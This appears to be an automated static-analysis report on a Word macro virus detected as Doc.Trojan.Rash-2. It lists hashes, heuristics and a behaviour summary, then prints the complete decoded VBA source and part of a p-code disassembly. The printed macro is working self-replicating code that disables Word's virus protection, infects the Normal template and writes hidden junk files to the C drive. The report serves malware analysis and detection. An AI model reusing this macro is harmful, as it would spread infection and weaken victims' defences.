Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 703ee022d86d109d…

MALICIOUS

Office (OLE)

Size: 44.0 KB
Created: 1997-09-17 10:18:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 593eed885e1315c4230f4ea303ff70cc
SHA-1: 115568b806ef29ddf8fbc531845b37c36b40a1bd
SHA-256: 703ee022d86d109def5c11e97edacc2c85fc306207ea0497dc26766e2dfc2744
Risk Score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains a VBA macro triggered by the Document_Open event, which simply calls Document_Close. That routine switches off Word's macro virus protection and its conversion and Normal-template save prompts, copies its own code lines into the Normal template (or, if Normal already carries the macro, into the active document), and then writes 20 files matching the pattern 'c:\AA??????.sys', with the six variable characters drawn from the string "RASHKILLER"; each file is extended to roughly 128 KB by seeking to offset 131070 and is marked hidden and system (SetAttr 6). The ClamAV detection 'Doc.Trojan.Rash-2' further supports the malicious nature of the file.

Heuristics 3

  • ClamAV: Doc.Trojan.Rash-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Rash-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6072 bytes
SHA-256: 5ec01f5a75e55047c2e1fadb6acf725c8f888ec747a0d92d242669e8d3f837ed
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Nabor = "RASHKILLER"
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Rem + Danil Igorev's Virus Laboratory  Pit-Santerburg   1999+
Rem +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
On Error Resume Next

con = "Private Sub Document_Close()"
col = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines

Dim mas(90)

Options.ConfirmConversions = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
no1 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)
no2 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1)

If no1 <> con Then
Set tst = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf no2 <> con Then
Set tst = ActiveDocument.VBProject.VBComponents.Item(1)
Else
tst = ""
End If

If tst <> "" Then
  For i = 1 To col
   mas(i) = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
  Next i
  
  For i = 1 To col
   tst.CodeModule.InsertLines i, mas(i)
  Next i
  
End If

For i = 1 To 20

 nam = "c:\AA"
 
 
  For j = 1 To 6
   kk = 10 * Rnd
   nam = nam + Mid(Nabor, Int(kk), 1)
  Next j
  
 nam = nam + ".sys"
 Open nam For Output As #1
 Seek #1, 65535 * 2
 Print #1,  'Enjoy your work'
 Close #1
 
 SetAttr nam, 6
 
Next i

End Sub

Private Sub Document_Open()
 Document_Close
End Sub


' Processing file: /opt/analyzer/scan_staging/2066648a6e3e4fc1ac0a959a51c7fa0c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8214 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	LitStr 0x000A "RASHKILLER"
' 	St Nabor 
' Line #2:
' 	Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
' Line #3:
' 	Rem 0x0040 " + Danil Igorev's Virus Laboratory  Pit-Santerburg   1999+"
' Line #4:
' 	Rem 0x0040 " +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
' Line #5:
' 	OnError (Resume Next) 
' Line #6:
' Line #7:
' 	LitStr 0x001C "Private Sub Document_Close()"
' 	St con 
' Line #8:
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St col 
' Line #9:
' Line #10:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x005A 
' 	VarDefn mas
' Line #11:
' Line #12:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt ConfirmConversions 
' Line #13:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #14:
' 	LitDI2 0x0000 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #15:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St no1 
' Line #16:
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St no2 
' Line #17:
' Line #18:
' 	Ld no1 
' 	Ld con 
' 	Ne 
' 	IfBlock 
' Line #19:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set tst 
' Line #20:
' 	Ld no2 
' 	Ld con 
' 	Ne 
' 	ElseIfBlock 
' Line #21:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set tst 
' Line #22:
' 	ElseBlock 
' Line #23:
' 	LitStr 0x0000 ""
' 	St tst 
' Line #24:
' 	EndIfBlock 
' Line #25:
' Line #26:
' 	Ld tst 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #27:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld col 
' 	For 
' Line #28:
' 	Ld i 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 

... (truncated)